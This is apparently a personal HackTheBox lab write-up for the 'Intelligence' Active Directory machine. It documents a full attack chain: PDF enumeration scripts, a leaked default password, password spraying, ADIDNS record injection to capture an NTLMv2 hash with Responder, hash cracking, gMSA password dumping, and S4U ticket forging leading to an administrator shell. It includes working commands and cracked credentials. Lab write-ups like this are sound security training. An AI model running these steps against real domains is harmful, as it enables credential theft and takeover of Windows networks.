HackTheBox · Lab

MediumWindowsActive DirectoryKerberos

NOTES

ENUMERATION

## NMAP


    ```shell
    PORT      STATE SERVICE       VERSION
    53/tcp    open  domain        Simple DNS Plus
    
    80/tcp    open  http          Microsoft IIS httpd 10.0
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-title: Intelligence
    |_http-server-header: Microsoft-IIS/10.0
    
    88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-30 13:30:02Z)
    
    135/tcp   open  msrpc         Microsoft Windows RPC
    
    139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
    
    389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
    |_ssl-date: 2025-07-30T13:31:32+00:00; +7h00m00s from scanner time.
    | ssl-cert: Subject: commonName=dc.intelligence.htb
    | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
    | Not valid before: 2021-04-19T00:43:16
    |_Not valid after:  2022-04-19T00:43:16
    
    445/tcp   open  microsoft-ds?
    
    593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    
    636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
    | ssl-cert: Subject: commonName=dc.intelligence.htb
    | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
    | Not valid before: 2021-04-19T00:43:16
    |_Not valid after:  2022-04-19T00:43:16
    |_ssl-date: 2025-07-30T13:31:32+00:00; +7h00m00s from scanner time.
    
    3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
    |_ssl-date: 2025-07-30T13:31:32+00:00; +7h00m00s from scanner time.
    | ssl-cert: Subject: commonName=dc.intelligence.htb
    | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
    | Not valid before: 2021-04-19T00:43:16
    |_Not valid after:  2022-04-19T00:43:16
    
    3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
    | ssl-cert: Subject: commonName=dc.intelligence.htb
    | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
    | Not valid before: 2021-04-19T00:43:16
    |_Not valid after:  2022-04-19T00:43:16
    |_ssl-date: 2025-07-30T13:31:31+00:00; +6h59m59s from scanner time.
    
    Host script results:
    |_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
    | smb2-time: 
    |   date: 2025-07-30T13:30:54
    |_  start_date: N/A
    | smb2-security-mode: 
    |   3:1:1: 
    |_    Message signing enabled and required
    ```


    Interesting ports


    ```shell
    53,80,88,135,389,445,3268
    ```


## DNS P53


    DNSENUM/NS/DNSRECON


        Null


## HTTP P80


    ![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/774a583d-4488-43eb-85eb-709dab90fdae/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466XWA4VZQ6%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082828Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIQCowNW%2FQgod91vVAVw7se2riw0nnlwKcU%2FtRxickoTDxQIgICTVb%2FHpA%2F95an37tNuBTpt8BlN6fgRgrGXhTCEnI7cq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDP7HHdiCiMcAaGriByrcA57pmYDOtPJWRspy%2BFXwTykM0SUILyqimDRcdPj%2FbPhtxK%2FkJdUtcVrtgyf6XDDC81o6SP%2F9KmoEPDlePrpJjzfrLlJJ96OfmVJOYBzl75qnm3RUTzQDlCz5EEu5Zf9Hp3zx8x8EecD%2BB1zq4BVGZ6WoCB2d%2FIiLFp2qQHung9ULGha3Cglfv1ylfUxA2Fe6Lez%2BReoSewITmKq%2BcWWFIBgpFhsbY3P36GOrrlC4y2O0Zc5eWPU14W0e0ZI%2F2BCFoDCkhRekDFr1YYva9RbwIoofTXRnzVFnWtwkq8BJW7fttymgJ06cg77UtJiS%2B6Qcun%2FpYKnbLWrxVIMmyHbqrsvABp5DzOZICtP50FlpJqMPaopyubqauXfEN%2B7jnoM%2BVhBtiKxmZMp5c5sTS%2FUvzptPZF6lKA5jvQFsJMwQQmfhMhmgxDRb2ifkK2sW3XH%2Bw3gulThRwYnj5NgiqMYwNBUHmPv4%2BLeN%2F3RjkyV68o8BspTvltMoQonipFu8A2xsGw6hDpYf69NUqPIJjuokZLDy%2Fr1w3qb2kZjZpnfVCap0YyJNcG5LU3n256%2BgPWCjPSQzbOJKKXGstW21O2E8ZhDYGDMQcBA%2BWCLer4l2sezv1oNSeCgsHe5oGQgqMO3zuc0GOqUBF78dFL5Smg%2F40JYCzH%2BhyzLxEzJhRiKhi5vq%2BBPE2ZkEd%2FQZhUUf9C%2BbuEZdcqy5x%2BL%2FrmnC1qZAbWO0OLHfsnAPto0wqPVu3ur%2BKxLCp3to08Rt1MgWLMiW9kfatvIKTpF%2BIupVIFfmBEdTzBi%2BzPhZPAhI9ZPx1MvqBRbCwB3hNB%2FfoUTGsVCJ%2F%2FcLKLIRjsGOIT3CXeyRsnZGVxLVOpffiUa1&X-Amz-Signature=7b637e75a748fa3007f3927f086c94a3473a42a78bca9d055bda74ec0c11d0ec&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


    WFUZZ/GOBUSTER


        Null


    MANUAL INSPECTION


        contact@intelligence.htb


        Noticed a pattern with the listed files


        ```shell
        <p class="mb-0 text-white-50"><a href="documents/2020-01-01-upload.pdf"
        <p class="mb-0 text-white-50"><a href="documents/2020-12-15-upload.pdf"
        ```


        I created a pythonscript for enumerating potential existing files. Starting with a wordlist containing dates


        ```shell
        from datetime import date, timedelta
        
        start_date = date(2010, 1, 1)
        end_date = date(2025, 12, 31)
        delta = timedelta(days=1)
        
        with open("dates_uploads.txt", "w") as f:
            current = start_date
            while current <= end_date:
                f.write(f"{current.strftime('%Y-%m-%d')}-upload.pdf\n")
                current += delta
        ```


        This gave me the output


        ```shell
        ❯ cat dates_uploads.txt
        2010-01-01-upload.pdf
        2010-01-02-upload.pdf
        2010-01-03-upload.pdf
        ...SNIP...
        2025-12-28-upload.pdf
        2025-12-29-upload.pdf
        2025-12-30-upload.pdf
        2025-12-31-upload.pdf
        ```


        Now let’s enumerate for existing files 


        We got several hits


        I created new script for auto-downloading all of them reading from the `dates_uploads.txt`


        ```shell
        import requests
        
        base_url = "http://intelligence.htb/documents/"
        
        # read filenames
        try:
            with open("dates_upload.txt", "r") as file:
                filenames = [line.strip() for line in file if line.strip()]
        except FileNotFoundError:
            print("Filen 'dates_upload.txt' hittades inte.")
            exit(1)
        
        # Download each PDF
        for name in filenames:
            url = base_url + name
            try:
                print(f"Downloading {name} ...")
                response = requests.get(url)
                if response.status_code == 200:
                    with open(name, "wb") as f:
                        f.write(response.content)
                else:
                    print(f"[!] Failed to download {name}: Status code {response.status_code}")
            except Exception as e:
                print(f"[!] Error downloading {name}: {e}")
        ```


        ```shell
        exiftool -Creator -csv *pdf | cut -d, -f2
        ```


        gives us a list of all the creators from the PDF files


        Converting pdfs to txt


        ```shell
        for f in *pdf; do pdftotext $f; done
        ```


        Now we can easier find something useful


        We `head` all the files to begin with, see if anything sticks out.


        Found 2 interesting files


        ```shell
        ==> 2020-06-04-upload.txt <==
        New Account Guide
        
        ==> 2020-12-30-upload.txt <==
        Internal IT Update
        ```


        Content


        ```shell
        ❯ cat 2020-06-04-upload.txt
        New Account Guide
        Welcome to Intelligence Corp!
        Please login using your username and the default password of:
        NewIntelligenceCorpUser9876
        After logging in please change your password as soon as possible.
        
        ❯ cat 2020-12-30-upload.txt
        Internal IT Update
        There has recently been some outages on our web servers. Ted has gotten a
        script in place to help notify us if this happens again.
        Also, after discussion following our recent security audit we are in the process
        of locking down our service accounts.
        ```


        Password found

        - `NewIntelligenceCorpUser9876`

## SMB P139/445


    ANON AUTH SUCCESS but null enum


    RPCCLIENT null


    PASSWORD SPRAYING


        Sprayed `NewIntelligenceCorpUser9876` against `kerbrute_users` and got 1 hit


        ```shell
        [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
        ```


    SHARE ENUM


        ```shell
        SHARE      PERMISSIONS   REMARK
        ---------- ------------ -------------------------------------------------
        ADMIN$                   Remote Admin
        C$                      Default share
        IPC$       READ          Remote IPC
        IT         READ          
        NETLOGON   READ          Logon server share
        SYSVOL     READ          Logon server share
        Users      READ
        ```


        Interesting:


        //IT


        ```shell
        downdetector.ps1
        
        # Check web server status. Scheduled to run every 5min
        Import-Module ActiveDirectory 
        foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
        try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if(.StatusCode -ne 200) {
        Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
        } catch {}
        }
        ```


        //Users


        ```shell
        Administrator
        All Users
        Default
        Default User
        Public
        Ted.Graves
        Tiffany.Molina
        ```

FOOTHOLD

We got hit on all creators using `kerbrute userenum` for existing users.


With the script in mind, we can leverage the permission which is granted by default to auth users to create arbitrary DNS records on AD integrated DNS (ADIDNS) zone to add new record that points to our own IP. 


```shell
❯ dnstool.py -u 'intelligence\Tiffany.Molina' -p $PASS -r webnrg.$DOMAIN -a add -t A -d 10.10.14.13 $IP
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
```


Capturing this with `responder`


![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/6ceafd46-bbee-4be1-9fd6-b9a2c341a670/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466UY3TYQBX%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082830Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIQCIIBfygmZ6nC3j%2BUOVkCahdhXjcA%2BOGqoJVbtwxJQ1WgIgH%2B7YxaYxq6SjlTprGWekG%2F4ryFtCscrdhYQWoKUsKEUq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDAmif3MSEbHGRO1JESrcA6eqGbCWs3UiwDIA1YVT0j%2BBc6e6NK1TFRQG0J4k5y1DjCu41%2BCC%2BsWsDOmNdGm6hWz2HyOu2XRVtvgkvj6U3HfkVnzh6C0a%2FLJo0eDquRWBZtU8X3lnRgS9%2F12FZyFXmWr5sjhcsBsUg5xzbvHlXxakBE2SXdNAcTasGvBhYY7Um7e5n%2FSP%2Fy%2FeR7A9xm29MPSpNbVW8nXUqiGG5F73OBhGX9nlvquYLC3zbbdx9N1OiKLI25mGhnRtvWzH1CJzgK30fQW4S5nhs4IetaEB1T0eiZE%2B92TWjYB7FDGA2wjRPqDv%2BIVxgD0ea25gYxSJuFuzziFn%2BQemtFlJBWnuYwKk3qkrwiHcsPjl3KtQzY7lzVgGAf0%2FVuok7zQOjmvb2GiCWcYZcEWCb81UTk6%2FDxkpKqvbZg1ZURJWuoENHqSxNCLfxXbRFA5vmPExfD1XNZn5JNYwIlu6LUepfSdz%2BAHO4tGRdqGfrRSUlY10jZS54i399iD6OXpAnD93x9MV480GFnFqB5JY3dukmQk%2Fk%2BmS%2FzAmy8zQf3i6G3ASylzetOiRrUvdLTHR0VPcvWdCEB86Fuqu1fmdPxg06tt57TP9hwYMrlJ3i7zmjyyLWKDB%2BqHiIfSx%2BIQp4HhEMO3zuc0GOqUBaqh12vieUgTXvNb75X6yVNDOu4Ap1%2BX66dEg0Ck3Q%2BeEd7YRNtbTvPuQAWZlvCl2gTPI%2FtW6uo9w3i8So6msycvSfR0qI95kfZP7ASeNw3ecbug6bvfhodsYHGbmEDl3rsWmTUsYo7ugpdYEWbsKPftgfWydvQqENlWzuWegQJgWPhCZDsOTfaWIIZndlEzVq%2FqUHtWdvycWHz69DcwH9JRGUrfg&X-Amz-Signature=ef5bd8e7a972055de6d21b3f548297f7cf70974b6fc5161eb0c9738182f43339&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


NTLMv2


```shell
Ted.Graves::intelligence:a78cc6f6cac77455:E58FF1FE932127D9648B1F5D4B46CC61:010100000000000041A2E75E6D01DC018AB54C1CBE793C9C000000000200080035004C0052004A0001001E00570049004E002D0057004C003800560059003300350048004D00460038000400140035004C0052004A002E004C004F00430041004C0003003400570049004E002D0057004C003800560059003300350048004D00460038002E0035004C0052004A002E004C004F00430041004C000500140035004C0052004A002E004C004F00430041004C000800300030000000000000000000000000200000B559C332E35713127A7B93EA0A9C3F339130B03E0B9394A7B948BE68F19574B00A001000000000000000000000000000000000000900380048005400540050002F007700650062006E00720067002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
```


Which was crackable with hashcat & rockyou


```shell
TED.GRAVES::intelligence:a78cc6....SNIP...000:Mr.Teddy
```


Password found

- `Mr.Teddy`

PRIVILEGE ESCALATION

BLOODHOUND


    ![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/80eaf581-0f46-4286-93db-83a0e4983609/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466WDBV2NNF%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082830Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIQCbZpS%2FnFQycpb2AE%2Bh2iooalOaWf33Nw0yC40TOVLLLwIgVhfCnpTjIsfB8tnbbWssVv6rLTV30HRCPkPFnXbm7tUq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDA6cJEy%2F235ZnYFHeSrcAxTfn1EwSEtPcQ8ygkskLeuf8oMEcumEEvwYoHXGqZxRLMs9mmOex%2F1Pdj4K6vjyufxRDK6%2FJ5P5kpdUNtgPgJGAF8rCnEb0pUqr4cugYDZkShlCarUYxM12pzkob2orcDuMJEe4dU2W3WivMXFYon2j6E53HkPuUyz5TGcXgkQ%2FzaagHC2zTioU72hAfz6FUQpFz5XZ%2B47g5Q2ebQ3PlUbbobljZlJ3qCDnm5GAdCmkPv6%2BX5GiSe3Z2nsaUPTHAAZP%2BEplqO1JHcLztby213sBSXx8GjYvTMi75422fGTsYD3pZleMitq8tUaxgPERyMLl0wFBru%2FEw4ZtLdM%2BHpufu3Plff7nD9QXZpmDidkF39iwDL5uApU%2BfC3KSwDwGiOU4XZTI4Tw%2BmD7J96gQQupWWxWtUPwt%2Bkb4HPTCyK5aqU7Z848HsiupMIpFaKvLQR8k%2FAGjN97QYmnu3X%2F3R7lFQblHH8LEE8%2BoFW0YZgjbNj4RcCwRGGYyiFALRH0sdrJsZzex%2FUfgXWQcQRgS40ZCtRWEl7mKkQ1SA9tVEJirwBXDsgSTKqlHV7vYGlsMK0PNACjkMipanzQW5yBlCb%2FhrgpNuJZuUqZMhr%2Bb31SrZo8tdr%2Fik7tUpimMPTzuc0GOqUBv3yyfKLMm0zHVzieqwl2w0i8binG9NzRYqrTgrhhb0W0QD14s0E4zbVv6ZV8MV3fviAbMe99n7BcrsTQJgz8%2FAvtvM%2BoGVoGLKmvIQsATPIvmsSqCI7bRCI3Riz1Xo7a2Kb1NUygsmzhQIAoOiF9oX5OVhXtYPZ3PdgOqBf9CbeUROtksWslYU%2Fykhrz1fF3T2PPb9xcktAc3U9yubUfqAkYBWwE&X-Amz-Signature=b0bfc61e61c43922fc1927a4d953a2466a869365541092c82c15cea50590a976&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


    With [`gMSADumper.py`](http://gmsadumper.py/) we can retrieve `SVC_INT$` ntlm


    ```shell
    gMSADumper.py -u $USER -p $PASS -d $DOMAIN
    Users or groups who can read password for svc_int$:
     > DC$
     > itsupport
    svc_int$:::a9f4721de917a40fd9010ad815708184
    svc_int$:aes256-cts-hmac-sha1-96:0ceb5372ef23f53495569d0c64710ce13f5d44684bbb2ad6ece5556b3dbe878b
    svc_int$:aes128-cts-hmac-sha1-96:3ba46b3946bf3a03d35e75f23db2ad90
    ```


    With all this, we can create ourself a silver ticket using `getST.py` 


    ```shell
    ❯ getST.py -spn WWW/$HOST.$DOMAIN -impersonate $TARGETUSER $DOMAIN/$USER -hashes :$HASH
    Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies 
    
    [-] CCache file is not found. Skipping...
    [*] Getting TGT for user
    [*] Impersonating administrator
    [*] Requesting S4U2self
    [*] Requesting S4U2Proxy
    [*] Saving ticket in administrator@WWW_DC.intelligence.htb@INTELLIGENCE.HTB.ccache
    ```


    Make sure clock skew is not too great


    ```shell
    ❯ wmiexec.py -k -no-pass dc.intelligence.htb
    Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies 
    
    [*] SMBv3.0 dialect used
    [!] Launching semi-interactive shell - Careful what you execute
    [!] Press help for extra shell commands
    C:\>whoami
    intelligence\administrator
    ```

SCOPE

IP	HOSTNAME	DOMAIN NAME	OS
10.10.10.248	DC	intelligence.htb	Win 10/Server 2019 x64

WEB SERVICE TECHNOLOGY

WEB

IIS 10.0 Windows Server

NIKTO

NULL

WFUZZ / GOBUSTER

FILES

DIRS

SUBDIRS

VHOSTS

USERS

```shell
Administrator
All Users
Default
Default User
Public
Ted.Graves
Tiffany.Molina
```

CREDENTIALS

```shell
# Password found
NewIntelligenceCorpUser9876

# valid creds
Tiffany.Molina:NewIntelligenceCorpUser9876
Ted.Graves:Mr.Teddy
```

NMAP

```shell
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
9389/tcp  open  adws
49666/tcp open  unknown
49691/tcp open  unknown
49692/tcp open  unknown
49711/tcp open  unknown
49717/tcp open  unknown
49740/tcp open  unknown
```

SMB SHARES

```shell
SHARE      
----------
ADMIN$
C$
IPC$
IT
NETLOGON
SYSVOL
Users
```

OTHER NOTES

```shell
ADIDNS abuse
ReadGMSAPassword abuse
Constrained delegation abuse
```

LOGS

IppSec Notes

https://youtu.be/Jg_BjkxdtsE

Capture NTLM with MSF

auxiliary(server/capture/http_ntlm)

SRVPORT
URIPATH /
SRVHOST
store file

Intelligence.pdf

file

Intelligence

NOTES

ENUMERATION

FOOTHOLD

PRIVILEGE ESCALATION

SCOPE

WEB SERVICE TECHNOLOGY

WEB

NIKTO

WFUZZ / GOBUSTER

FILES

DIRS

SUBDIRS

VHOSTS

USERS

CREDENTIALS

NMAP

SMB SHARES

OTHER NOTES

LOGS

IppSec Notes

ⓒ 0xNRG